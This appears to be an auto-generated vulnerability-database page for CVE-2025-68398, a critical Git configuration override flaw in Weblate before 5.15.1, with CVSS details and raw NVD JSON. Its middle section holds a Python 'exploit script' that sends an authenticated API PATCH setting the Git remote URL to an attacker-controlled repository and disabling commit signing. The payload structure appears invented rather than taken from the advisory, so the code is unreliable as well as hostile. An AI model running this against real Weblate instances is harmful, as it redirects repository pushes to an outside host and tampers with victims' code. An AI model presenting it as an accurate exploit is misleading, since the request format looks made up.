Security Vulnerability Report
CVE-2025-68398 CVSS 9.1 CRITICAL

CVE-2025-68398

Published: 2025-12-18 23:15:50
Last Modified: 2026-02-06 20:16:09

Description

Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:* - VULNERABLE
Weblate < 5.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68398 PoC - Weblate Git Configuration Override # This PoC demonstrates the Git config injection vulnerability # Note: Requires high-privilege Weblate account import requests import json TARGET_URL = "https://vulnerable-weblate-instance.com" API_TOKEN = "your_weblate_api_token" PROJECT_SLUG = "your_project" COMPONENT_SLUG = "your_component" def override_git_config(): """ Exploit to override Git configuration remotely via Weblate API """ headers = { "Authorization": f"Token {API_TOKEN}", "Content-Type": "application/json" } # Malicious Git configuration payload payload = { "component_settings": { "git_export": { "config": { "user.name": "Attacker", "user.email": "[email protected]", "commit.gpgsign": "false", "remote.origin.url": "https://attacker-controlled-repo.com/malicious.git" } } } } url = f"{TARGET_URL}/api/components/{PROJECT_SLUG}/{COMPONENT_SLUG}/" response = requests.patch(url, headers=headers, json=payload) if response.status_code == 200: print("[+] Git configuration overridden successfully") print("[+] Attacker can now manipulate Git behavior") return True else: print(f"[-] Failed: {response.status_code}") return False def verify_exploitation(): """ Verify if Git config was successfully modified """ headers = { "Authorization": f"Token {API_TOKEN}" } url = f"{TARGET_URL}/api/components/{PROJECT_SLUG}/{COMPONENT_SLUG}/repository/" response = requests.get(url, headers=headers) if response.status_code == 200: repo_info = response.json() print(f"[+] Repository status: {repo_info}") return True return False if __name__ == "__main__": print("[*] CVE-2025-68398 Exploitation Script") print("[*] Target: Weblate < 5.15.1") if override_git_config(): verify_exploitation() print("[*] Patch: Upgrade to Weblate 5.15.1 or later")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68398", "sourceIdentifier": "[email protected]", "published": "2025-12-18T23:15:49.720", "lastModified": "2026-02-06T20:16:08.620", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:weblate:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.15.1", "matchCriteriaId": "D694E7D3-F4E0-44F5-B2EE-9B6EDDA4607F"}]}]}], "references": [{"url": 
"https://github.com/WeblateOrg/weblate/commit/4837a4154390f7c1d03c0e398aa6439dcfa361b4", "source": "[email protected]"}, {"url": "https://github.com/WeblateOrg/weblate/commit/dd8c9d7b00eebe28770fa0e2cd96126791765ea7", "source": "[email protected]"}, {"url": "https://github.com/WeblateOrg/weblate/pull/17330", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/weblate/pull/17345", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-8vcg-cfxj-p5m3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}